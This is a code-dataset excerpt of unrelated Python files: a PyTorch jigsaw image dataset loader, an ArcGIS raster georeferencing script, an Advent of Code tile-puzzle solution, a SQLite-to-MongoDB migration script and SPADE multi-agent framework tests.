"sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 14160, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "re.compile", "line_number": 100, "usage_type": "call"}, {"api_name": "re.DOTALL", "line_number": 102, "usage_type": "attribute"}, {"api_name": "re.MULTILINE", "line_number": 102, "usage_type": "attribute"}, {"api_name": "re.sub", "line_number": 104, "usage_type": "call"}, {"api_name": "typing.IO", "line_number": 107, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 132, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 245, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 265, "usage_type": "call"}, {"api_name": "re.search", "line_number": 391, "usage_type": "call"}, {"api_name": "re.search", "line_number": 403, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 409, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 414, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 443, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 528, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 530, "usage_type": "call"}, {"api_name": "os.path", "line_number": 530, "usage_type": "attribute"}]} +{"seq_id": "507002957", "text": "# This code is modified from https://github.com/facebookresearch/low-shot-shrink-hallucinate\n\nimport torch\nfrom PIL import Image\nimport json\nimport numpy as np\nimport torchvision.transforms as transforms\nimport os\n\n# jigsaw patch positions\npatch_xl = np.array([0,0,0,74,74,74,148,148,148])\npatch_xr = np.array([74,74,74,148,148,148,224,224,224])\npatch_yl = np.array([0,74,148,0,74,148,0,74,148])\npatch_yr = np.array([74,148,224,74,148,224,74,148,224])\n\nidentity = lambda x:x\nclass SimpleDataset:\n def __init__(self, data_file, transform, target_transform=identity):\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n self.transform = transform\n self.target_transform = target_transform\n\n\n def __getitem__(self,i):\n image_path = os.path.join(self.meta['image_names'][i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = 
self.target_transform(self.meta['image_labels'][i])\n return img, target\n\n def __len__(self):\n return len(self.meta['image_names'])\n\nclass JigsawDataset:\n def __init__(self, data_file, transform, max_replace_block_num=4, target_transform=identity):\n self.max_replace_block_num = max_replace_block_num\n self.transform = transform\n self.target_transform = target_transform\n\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n self.cl_list = np.unique(self.meta['image_labels']).tolist()\n\n self.sub_meta = {}\n for cl in self.cl_list:\n self.sub_meta[cl] = []\n\n for x, y in zip(self.meta['image_names'], self.meta['image_labels']):\n self.sub_meta[y].append(x)\n\n self.meta['image_labels'] = np.array(self.meta['image_labels'])\n\n self.original_size = len(self.meta['image_names'])\n\n def __getitem__(self, i):\n image_path = os.path.join(self.meta['image_names'][i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = self.target_transform(self.meta['image_labels'][i])\n\n # ori_im = img.clone()\n\n if self.max_replace_block_num == 0:\n replace_block_num = 0\n replaced_indexs = []\n else:\n replace_block_num = np.random.randint(1, self.max_replace_block_num+1)\n replaced_indexs = np.random.choice(9, replace_block_num, replace=False)\n\n is_same_cls = np.random.randint(0, 2)\n\n if is_same_cls == 0: # use a random image\n choose = np.random.randint(0, self.original_size)\n auxiliary_image_path = os.path.join(self.meta['image_names'][choose])\n auxiliary_image = Image.open(auxiliary_image_path).convert('RGB')\n auxiliary_image = self.transform(auxiliary_image)\n else: # use an image in same class\n labels = self.meta['image_labels']\n same_cls_idxs = np.where(labels == target)[0]\n choose = np.random.choice(same_cls_idxs, 1)[0]\n auxiliary_image_path = os.path.join(self.meta['image_names'][choose])\n auxiliary_image = Image.open(auxiliary_image_path).convert('RGB')\n auxiliary_image = self.transform(auxiliary_image)\n\n for l in range(replace_block_num):\n replaced_index = replaced_indexs[l]\n img[0:3, patch_xl[replaced_index]:patch_xr[replaced_index], patch_yl[replaced_index]:patch_yr[replaced_index]] = auxiliary_image[0:3,\n patch_xl[replaced_index]:patch_xr[replaced_index],\n patch_yl[replaced_index]:patch_yr[replaced_index]]\n\n return img, target\n\n def __len__(self):\n return len(self.meta['image_names'])\n\n\nclass SetDataset:\n def __init__(self, data_file, batch_size, transform):\n with open(data_file, 'r') as f:\n self.meta = json.load(f)\n \n self.cl_list = np.unique(self.meta['image_labels']).tolist()\n\n self.sub_meta = {}\n for cl in self.cl_list:\n self.sub_meta[cl] = []\n\n for x,y in zip(self.meta['image_names'],self.meta['image_labels']):\n self.sub_meta[y].append(x)\n\n self.sub_dataloader = [] \n sub_data_loader_params = dict(batch_size = batch_size,\n shuffle = True,\n num_workers = 0, #use main thread only or may receive multiple batches\n pin_memory = False) \n for cl in self.cl_list:\n sub_dataset = SubDataset(self.sub_meta[cl], cl, transform = transform )\n self.sub_dataloader.append(torch.utils.data.DataLoader(sub_dataset, **sub_data_loader_params) )\n\n def __getitem__(self,i):\n return next(iter(self.sub_dataloader[i]))\n\n def __len__(self):\n return len(self.cl_list)\n\nclass SubDataset:\n def __init__(self, sub_meta, cl, transform=transforms.ToTensor(), target_transform=identity):\n self.sub_meta = sub_meta\n self.cl = cl \n self.transform = transform\n self.target_transform = target_transform\n\n def 
__getitem__(self,i):\n #print( '%d -%d' %(self.cl,i))\n image_path = os.path.join( self.sub_meta[i])\n img = Image.open(image_path).convert('RGB')\n img = self.transform(img)\n target = self.target_transform(self.cl)\n return img, target\n\n def __len__(self):\n return len(self.sub_meta)\n\nclass EpisodicBatchSampler(object):\n def __init__(self, n_classes, n_way, n_episodes, shuffle=True):\n self.n_classes = n_classes\n self.n_way = n_way\n self.n_episodes = n_episodes\n self.shuffle = shuffle\n\n def __len__(self):\n return self.n_episodes\n\n def __iter__(self):\n for i in range(self.n_episodes):\n if self.shuffle:\n extracted_cls = torch.randperm(self.n_classes)[:self.n_way]\n else:\n extracted_cls = [x for x in range(self.n_classes)][:self.n_way]\n yield extracted_cls\n\n\n\n\n", "sub_path": "data/dataset.py", "file_name": "dataset.py", "file_ext": "py", "file_size_in_byte": 6143, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 14, "usage_type": "call"}, {"api_name": "json.load", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 27, "usage_type": "name"}, {"api_name": "json.load", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 68, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 76, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 76, "usage_type": "name"}, {"api_name": "numpy.where", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 83, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 83, "usage_type": "name"}, {"api_name": 
"json.load", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 119, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 119, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 128, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 128, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 137, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 137, "usage_type": "name"}, {"api_name": "torch.randperm", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "470879613", "text": "# -*- coding: cp1254 -*-\n# -*- ##################\n# ---------------------------------------------------------------------------\n# create_semih_archydro.py\n#\n# Coded by :\n# Semih DALGIN\n# semihdalgin@gmail.com\n#\n#\n# ---------------------------------------------------------------------------\n# Import system modules\nimport arcpy, time, datetime, os, sys, string, csv, shutil, fileinput, string\nimport arcgisscripting\nmxd = arcpy.mapping.MapDocument(\"CURRENT\")\ndf = arcpy.mapping.ListDataFrames(mxd,\"Layers\")[0]\narcpy.env.overwriteOutput=True\n\n\ntry:\n # Script arguments\n arcpy.AddMessage (\"\\nDr.Semih DALGIN tarafından yapıldı.\")\n arcpy.AddMessage (\"\\nİletişim adresi: semihdalgin@gmail.com\")\n arcpy.AddMessage (\"\\nBaşlangıç Değerleri Alınıyor...\" )\n\n try:\n # Make parameters array, and later write input parameter values to an output file\n parameters = []\n now = datetime.datetime.now()\n parameters.append(\"Date and Time: \"+ now.strftime(\"%Y-%m-%d %H:%M\"))\n # Folder where output files will be saved\n workspace1 = arcpy.GetParameterAsText(0)\n # Donusum Dosyasi\n don = arcpy.GetParameterAsText(1)\n # DRE\n #dre = arcpy.GetParameterAsText(2)\n # Projeksiyon\n prj = arcpy.GetParameterAsText(2)\n \n except:\n arcpy.AddMessage(\"\\nError in input arguments: \" + arcpy.GetMessages(2))\n raise Exception\n # Check and create output folders\n try:\n arcpy.AddMessage(\"\\nCreating output folders...\")\n thefolders=[\"DRE\",\"ULKE\"]\n for folder in thefolders:\n if not arcpy.Exists(workspace1 + folder):\n arcpy.CreateFolder_management(workspace1, folder)\n except:\n arcpy.AddError(\"\\nError creating output folders: \" + arcpy.GetMessages(2))\n raise Exception\n # Calculations\n try:\n arcpy.env.workspace=workspace1\n rstname = arcpy.ListDatasets()\n cc=0\n \n for fc in rstname:\n cc=cc+1\n for xox in range (0,cc,1):\n rssa=rstname[xox].split(os.extsep)[0]\n exportname=workspace1+\"\\\\DRE\\\\\"+rssa+\".tif\"\n exportname1=workspace1+\"\\\\ULKE\\\\\"+rssa+\".tif\"\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(rssa)+\" \"+str(xox+1))\n dreal=workspace1+\"\\\\\"+rssa+\".dre\"\n dreadi=workspace1+\"\\\\DRE\\\\\"+rssa+\".txt\"\n \n dosyadre = open(dreal) \n asd = dosyadre.read() \n dosya1 = open(dreadi, 'a+') \n\n with open(dreal) as openfile:\n for line in openfile:\n for part in line.split():\n if \"RasterPY1=\" in part:\n a1= part.split('=')[1]\n if \"RasterPX1=\" in part:\n a2= part.split('=')[1]\n if \"HaritaPY1=\" in part:\n a3= part.split('=')[1]\n if \"HaritaPX1=\" in part:\n a4= part.split('=')[1]\n if \"RasterPY2=\" in part:\n a5= part.split('=')[1]\n if \"RasterPX2=\" in part:\n a6= part.split('=')[1]\n if 
\"HaritaPY2=\" in part:\n a7= part.split('=')[1]\n if \"HaritaPX2=\" in part:\n a8= part.split('=')[1]\n if \"RasterPY3=\" in part:\n a9= part.split('=')[1]\n if \"RasterPX3=\" in part:\n a10= part.split('=')[1]\n if \"HaritaPY3=\" in part:\n a11= part.split('=')[1]\n if \"HaritaPX3=\" in part:\n a12= part.split('=')[1]\n if \"RasterPY4=\" in part:\n a13= part.split('=')[1]\n if \"RasterPX4=\" in part:\n a14= part.split('=')[1]\n if \"HaritaPY4=\" in part:\n a15= part.split('=')[1]\n if \"HaritaPX4=\" in part:\n a16= part.split('=')[1]\n \n dosya1.write(a1+\",\"+a2+\",\"+a3+\",\"+a4+\"\\n\"+a5+\",\"+a6+\",\"+a7+\",\"+a8+\"\\n\"+a9+\",\"+a10+\",\"+a11+\",\"+a12+\"\\n\"+a13+\",\"+a14+\",\"+a15+\",\"+a16+\"\\n\") \n dosya1.close()\n \n if not arcpy.Exists(exportname):\n dosya=workspace1+\"\\\\\"+rstname[xox]\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(dosya))\n arcpy.WarpFromFile_management(dosya,exportname,dreadi,\"POLYORDER1\",\"NEAREST\")\n arcpy.DefineProjection_management(exportname,prj)\n if not arcpy.Exists(exportname1):\n dosya1=workspace1+\"\\\\DRE\\\\\"+rstname[xox]\n arcpy.AddMessage(\"\\nÇalışılan Dosya \" + str(dosya1))\n arcpy.WarpFromFile_management(dosya1,exportname1,don,\"POLYORDER1\",\"NEAREST\")\n arcpy.DefineProjection_management(exportname1,prj) \n except:\n arcpy.AddError(\"\\nHata Hesaplamalarda\" + arcpy.GetMessages(2))\n raise Exception \nexcept:\n arcpy.AddError(\"\\nError running script\")\n raise Exception\n", "sub_path": "L2U_DRE.py", "file_name": "L2U_DRE.py", "file_ext": "py", "file_size_in_byte": 5322, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "arcpy.mapping.MapDocument", "line_number": 15, "usage_type": "call"}, {"api_name": "arcpy.mapping", "line_number": 15, "usage_type": "attribute"}, {"api_name": "arcpy.mapping.ListDataFrames", "line_number": 16, "usage_type": "call"}, {"api_name": "arcpy.mapping", "line_number": 16, "usage_type": "attribute"}, {"api_name": "arcpy.env", "line_number": 17, "usage_type": "attribute"}, {"api_name": "arcpy.AddMessage", "line_number": 22, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 23, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 29, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 29, "usage_type": "attribute"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 32, "usage_type": "call"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 34, "usage_type": "call"}, {"api_name": "arcpy.GetParameterAsText", "line_number": 38, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 41, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 41, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 45, "usage_type": "call"}, {"api_name": "arcpy.Exists", "line_number": 48, "usage_type": "call"}, {"api_name": "arcpy.CreateFolder_management", "line_number": 49, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 51, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 51, "usage_type": "call"}, {"api_name": "arcpy.env", "line_number": 55, "usage_type": "attribute"}, {"api_name": "arcpy.ListDatasets", "line_number": 56, "usage_type": "call"}, {"api_name": "os.extsep", "line_number": 62, "usage_type": "attribute"}, {"api_name": "arcpy.AddMessage", "line_number": 65, "usage_type": "call"}, {"api_name": 
"arcpy.Exists", "line_number": 112, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 114, "usage_type": "call"}, {"api_name": "arcpy.WarpFromFile_management", "line_number": 115, "usage_type": "call"}, {"api_name": "arcpy.DefineProjection_management", "line_number": 116, "usage_type": "call"}, {"api_name": "arcpy.Exists", "line_number": 117, "usage_type": "call"}, {"api_name": "arcpy.AddMessage", "line_number": 119, "usage_type": "call"}, {"api_name": "arcpy.WarpFromFile_management", "line_number": 120, "usage_type": "call"}, {"api_name": "arcpy.DefineProjection_management", "line_number": 121, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 123, "usage_type": "call"}, {"api_name": "arcpy.GetMessages", "line_number": 123, "usage_type": "call"}, {"api_name": "arcpy.AddError", "line_number": 126, "usage_type": "call"}]} +{"seq_id": "339630696", "text": "def input():\n input_data = list(filter(None, open('day_20/input.txt').read().split('\\n\\n')))\n return list(map(lambda lines: Tile(lines), input_data))\n\nclass Tile:\n def __init__(self, lines):\n lines = lines.split('\\n')\n self.id = int(lines[0].split()[1].strip(':'))\n self.image = [line.strip() for line in lines[1:]]\n self.build_borders()\n\n def build_borders(self):\n lines = self.image\n self.borders = [\n ''.join(lines[0]),\n ''.join([line[-1] for line in lines]),\n ''.join(reversed(lines[-1])),\n ''.join([line[0] for line in reversed(lines)]),\n ]\n self.flipped_borders = [\n ''.join(reversed(lines[0])),\n ''.join([line[-1] for line in reversed(lines)]),\n ''.join(lines[-1]),\n ''.join([line[0] for line in lines]),\n ]\n\n def flip(self):\n self.image = [''.join(reversed(line)) for line in self.image[:]]\n self.build_borders()\n\n def rotate(self):\n size = len(self.image)\n new_image = []\n for x in range(0, size):\n new_image.append([])\n for y in range(0, size):\n new_image[x].append(self.image[size - 1 - y][x])\n self.image = [''.join(line) for line in new_image]\n self.build_borders()\n\n\nfrom collections import defaultdict\n\ndef count_border_ids(tiles):\n border_id_counts = defaultdict(int)\n\n for tile in tiles:\n for border in tile.borders:\n border_id_counts[border] += 1\n for border in tile.flipped_borders:\n border_id_counts[border] += 1\n return border_id_counts\n\ndef count_unique_borders(borders, border_id_counts):\n count = 0\n for border in borders:\n if border_id_counts[border] == 1:\n count += 1\n return count\n\ndef find_corners(tiles, border_id_counts):\n corners = set()\n corners_total = 1\n for tile in tiles:\n if count_unique_borders(tile.borders, border_id_counts) == 2 or count_unique_borders(tile.flipped_borders, border_id_counts) == 2:\n corners.add(tile)\n corners_total *= tile.id\n return corners, corners_total\n\ndef part_1(tiles):\n border_id_counts = count_border_ids(tiles)\n corners, corners_total = find_corners(tiles, border_id_counts)\n return corners_total\n\n\ndef find_matching_tile(tiles, searched, border_index, done):\n for tile in tiles:\n if tile.id in done:\n continue\n if searched in tile.flipped_borders:\n tile.flip()\n if searched not in tile.borders:\n raise Exception('Bad flip.')\n if searched in tile.borders:\n while searched != tile.borders[border_index]:\n tile.rotate()\n done.add(tile.id)\n return tile\n raise Exception('Image tile not found.')\n\ndef find_first_image_column(tiles, image, image_size, done, border_id_counts):\n x = 0\n for y in range(1, image_size):\n searched = image[x][y-1].flipped_borders[2]\n tile = 
find_matching_tile(tiles, searched, 0, done)\n if border_id_counts[tile.borders[3]] != 1:\n raise Exception('Not a proper border tile: %d.' % border_id_counts[tile.borders[1]])\n image[x].append(tile)\n\ndef find_other_image_columns(tiles, image, image_size, done):\n for x in range(1, image_size):\n image.append([])\n for y in range(0, image_size):\n searched = image[x-1][y].flipped_borders[1]\n tile = find_matching_tile(tiles, searched, 3, done)\n image[x].append(tile)\n\ndef make_full_image_tile(tiles, top_left, border_id_counts):\n while border_id_counts[top_left.borders[0]] != 1 or border_id_counts[top_left.borders[3]] != 1:\n top_left.rotate()\n\n done = set()\n done.add(top_left.id)\n\n image = [[top_left]]\n image_size = 12\n\n find_first_image_column(tiles, image, image_size, done, border_id_counts)\n find_other_image_columns(tiles, image, image_size, done)\n\n lines = ['Tile 0:']\n for y in range(0, image_size):\n for sub_y in range(1, len(image[0][0].image) - 1):\n line_parts = []\n for x in range(0, image_size):\n line_parts.append(image[x][y].image[sub_y][1:-1])\n lines.append(''.join(line_parts))\n return Tile('\\n'.join(lines))\n\ndef count_monster_dots(full_image):\n monster = [\n (18, 0),\n (0, 1), (5, 1), (6, 1), (11, 1), (12, 1), (17, 1), (18, 1), (19, 1), \n (1, 2), (4, 2), (7, 2), (10, 2), (13, 2), (16, 2), \n ]\n\n size = len(full_image.image[0])\n count = 0\n for flip in range(0, 2):\n full_image.flip()\n for rot in range(0, 4):\n full_image.rotate()\n for x in range(0, size):\n for y in range(0, size):\n for delta in monster:\n mx = x+delta[0]\n my = y+delta[1]\n if mx >= size or my >= size:\n break\n if full_image.image[my][mx] != '#':\n break\n else:\n count += 1\n return count * len(monster)\n\ndef count_image_dots(full_image):\n dot_count = 0\n size = len(full_image.image[0])\n for x in range(0, size):\n for y in range(0, size):\n if full_image.image[y][x] == '#':\n dot_count += 1\n return dot_count\n\n\ndef part_2(tiles):\n border_id_counts = count_border_ids(tiles)\n corners, corners_total = find_corners(tiles, border_id_counts)\n full_image = make_full_image_tile(tiles, corners.pop(), border_id_counts)\n return count_image_dots(full_image) - count_monster_dots(full_image)\n\nif __name__ == '__main__':\n print(part_1(input()))\n print(part_2(input()))\n", "sub_path": "day_20/day_20.py", "file_name": "day_20.py", "file_ext": "py", "file_size_in_byte": 5821, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "collections.defaultdict", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "258907782", "text": "import pymongo\nimport os\nfrom dotenv import load_dotenv\nimport sqlite3\nimport pandas as pd\n\nload_dotenv()\n\nDB_URL = os.getenv(\"DB_URL\")\n\nconnection_uri = DB_URL\nclient = pymongo.MongoClient(connection_uri)\n\nsl_conn = sqlite3.connect('rpg_db.sqlite3') # connect to rpg database\nsl_curs = sl_conn.cursor()\n\nqueries = [['charactercreator_character', 'SELECT * FROM charactercreator_character'],\n ['armory_item', 'SELECT * FROM armory_item'], ['armory_weapoon', 'SELECT * FROM armory_weapon'],\n ['charactercreator_character_inventory', 'SELECT * FROM charactercreator_character_inventory'],\n ['charactercreator_cleric', 'SELECT * FROM charactercreator_cleric'],\n ['charactercreator_fighter', 'SELECT * FROM charactercreator_fighter'],\n ['charactercreator_mage', 'SELECT * FROM charactercreator_mage'],\n ['charactercreator_necromancer', 'SELECT * FROM 
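A worked micro-example of the 90-degree rotation Tile.rotate implements above: new[x][y] = old[size-1-y][x] is a clockwise turn, equivalently "reverse the rows, then transpose".

def rotate_cw(grid):
    # zip(*reversed(grid)) pairs up column entries of the row-reversed grid
    return [''.join(row) for row in zip(*reversed(grid))]

grid = ['ab',
        'cd']
assert rotate_cw(grid) == ['ca', 'db']  # 'a' ends up top-right, as in Tile.rotate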
charactercreator_necromancer'],\n ['charactercreator_thief', 'SELECT * FROM charactercreator_thief']]\n\ndb = client.rpgdata\nfor query in queries:\n collection_name = query[0]\n\n get_query = query[1]\n objects = sl_curs.execute(get_query).fetchall()\n\n df = pd.read_sql(get_query, con=sl_conn)\n df = df.to_dict(orient='records')\n\n db[collection_name].insert_many(df)\n\nsl_conn.close()\n\n# I enjoyed working with mongodb much more than postgresql. I found really nothing that was harder and everything\n# was more simple. The more relaxed rules of mongodb make it easier to work with. However, in a real prod environment,\n# I can definitely see some downsides as well as upsides to mongodb.\n", "sub_path": "module3-nosql-and-document-oriented-databases/mongo.py", "file_name": "mongo.py", "file_ext": "py", "file_size_in_byte": 1617, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 7, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 9, "usage_type": "call"}, {"api_name": "pymongo.MongoClient", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "301037339", "text": "import asyncio\n\nimport aioxmpp\nfrom aioxmpp import PresenceManagedClient\nfrom asynctest import CoroutineMock, Mock\nfrom testfixtures import LogCapture\n\nfrom spade.agent import Agent\nfrom spade.behaviour import OneShotBehaviour\nfrom spade.message import Message\nfrom spade.template import Template\nfrom .factories import MockedAgentFactory\n\n\ndef test_create_agent(mocker):\n agent = Agent(\"jid@server\", \"fake_password\")\n agent._async_connect = CoroutineMock()\n\n assert agent.is_alive() is False\n\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n agent._async_connect.assert_called_once()\n assert agent.stream is None\n\n agent.conn_coro = mocker.Mock()\n agent.conn_coro.__aexit__ = CoroutineMock()\n\n assert agent.is_alive() is True\n future = agent.stop()\n future.result()\n\n agent.conn_coro.__aexit__.assert_called_once()\n\n assert agent.is_alive() is False\n\n\ndef test_connected_agent():\n agent = MockedAgentFactory()\n assert agent.is_alive() is False\n\n future = agent.start(auto_register=False)\n assert future.result() is None\n assert agent.is_alive() is True\n\n future = agent.stop()\n future.result()\n assert agent.is_alive() is False\n\n\ndef test_name():\n agent = MockedAgentFactory(jid=\"john@fake_server\")\n assert agent.name == \"john\"\n\n\ndef test_avatar():\n agent = MockedAgentFactory(jid=\"test_avatar@fake_server\")\n assert (\n agent.avatar\n == \"http://www.gravatar.com/avatar/44bdc5585ef57844edb11c5b9711d2e6?d=monsterid\"\n )\n\n\ndef test_setup():\n agent = MockedAgentFactory()\n agent.setup = CoroutineMock()\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n agent.setup.assert_called_once()\n agent.stop()\n\n\ndef test_set_get():\n agent = MockedAgentFactory()\n agent.set(\"KB_name\", \"KB_value\")\n assert agent.get(\"KB_name\") == \"KB_value\"\n\n\ndef test_get_none():\n agent = MockedAgentFactory()\n assert agent.get(\"KB_name_unknown\") is None\n\n\ndef test_client():\n agent = MockedAgentFactory()\n assert agent.client is None\n\n future = agent.start()\n future.result()\n assert type(agent.client) == PresenceManagedClient\n\n\ndef test_register():\n 
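A small follow-up sketch for the migration above (run it before sl_conn.close(); note the 'armory_weapoon' spelling is carried over from the queries list, and count_documents needs pymongo 3.7+): compare SQLite row counts against MongoDB document counts per collection.

for table, query in queries:
    # SQLite allows COUNT(*) over an unaliased subquery
    (rows,) = sl_curs.execute('SELECT COUNT(*) FROM (%s)' % query).fetchone()
    docs = db[table].count_documents({})
    print(table, rows, docs, 'OK' if rows == docs else 'MISMATCH')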
agent = MockedAgentFactory()\n agent.register = Mock()\n\n future = agent.start(auto_register=True)\n assert future.result() is None\n\n assert len(agent._async_register.mock_calls) == 1\n\n agent.stop()\n\n\ndef test_receive_without_behaviours():\n agent = MockedAgentFactory()\n aiomsg = aioxmpp.Message(type_=aioxmpp.MessageType.CHAT)\n msg = Message.from_node(aiomsg)\n\n assert agent.traces.len() == 0\n future = agent.start(auto_register=False)\n assert future.result() is None\n\n with LogCapture() as log:\n agent._message_received(aiomsg)\n log.check_present(\n (\"spade.Agent\", \"WARNING\", f\"No behaviour matched for message: {msg}\")\n )\n\n assert agent.traces.len() == 1\n assert msg in agent.traces.store[0]\n\n agent.stop()\n\n\ndef test_create_agent_from_another_agent():\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent._done = True\n self.kill()\n\n class CreateBehav(OneShotBehaviour):\n async def run(self):\n self.agent.agent2 = MockedAgentFactory()\n self.agent.agent2._done = False\n self.agent.dummy_behav = DummyBehav()\n self.agent.agent2.add_behaviour(self.agent.dummy_behav)\n await self.agent.agent2.start(auto_register=False)\n self.kill()\n\n agent1 = MockedAgentFactory()\n agent1.agent2 = None\n create_behav = CreateBehav()\n agent1.add_behaviour(create_behav)\n future = agent1.start(auto_register=False)\n assert future.result() is None\n assert agent1.is_alive()\n\n create_behav.join()\n agent1.dummy_behav.join()\n\n assert agent1.agent2.is_alive()\n assert agent1.agent2._done\n\n agent1.agent2.stop()\n agent1.stop()\n\n\ndef test_create_agent_from_another_agent_from_setup():\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent._done = True\n self.kill()\n\n class SetupAgent(Agent):\n async def setup(self):\n self.agent2 = MockedAgentFactory()\n self.agent2._done = False\n self.agent2.dummy_behav = DummyBehav()\n self.agent2.add_behaviour(self.agent2.dummy_behav)\n await self.agent2.start(auto_register=False)\n\n agent1 = SetupAgent(\"fake@host\", \"secret\")\n agent1._async_connect = CoroutineMock()\n agent1._async_register = CoroutineMock()\n agent1.conn_coro = Mock()\n agent1.conn_coro.__aexit__ = CoroutineMock()\n agent1.stream = Mock()\n\n agent1.agent2 = None\n\n future = agent1.start(auto_register=False)\n assert future.result() is None\n assert agent1.is_alive()\n\n agent1.agent2.dummy_behav.join()\n\n assert agent1.agent2.is_alive()\n assert agent1.agent2._done\n\n agent1.agent2.stop()\n agent1.stop()\n\n\ndef test_submit_send():\n agent = MockedAgentFactory()\n\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n self.agent.recv_msg = await self.receive(10)\n\n template = Template(to=\"fake@jid\")\n behav = DummyBehav()\n agent.add_behaviour(behav, template=template)\n\n future = agent.start(auto_register=False)\n future.result()\n\n msg_to_send = Message(to=\"fake@jid\", body=\"BODY\", metadata={\"performative\": \"TEST\"})\n agent.submit(behav.send(msg_to_send))\n behav.join()\n\n assert str(agent.recv_msg.to) == \"fake@jid\"\n assert agent.recv_msg.body == \"BODY\"\n assert agent.recv_msg.metadata == {\"performative\": \"TEST\"}\n\n\ndef test_stop_agent_with_blocking_await():\n agent1 = MockedAgentFactory()\n agent1.value = 1000\n\n class StopBehav(OneShotBehaviour):\n async def run(self):\n await asyncio.sleep(0.5)\n await self.agent.stop()\n\n class DummyBehav(OneShotBehaviour):\n async def run(self):\n await self.receive(timeout=1000000)\n 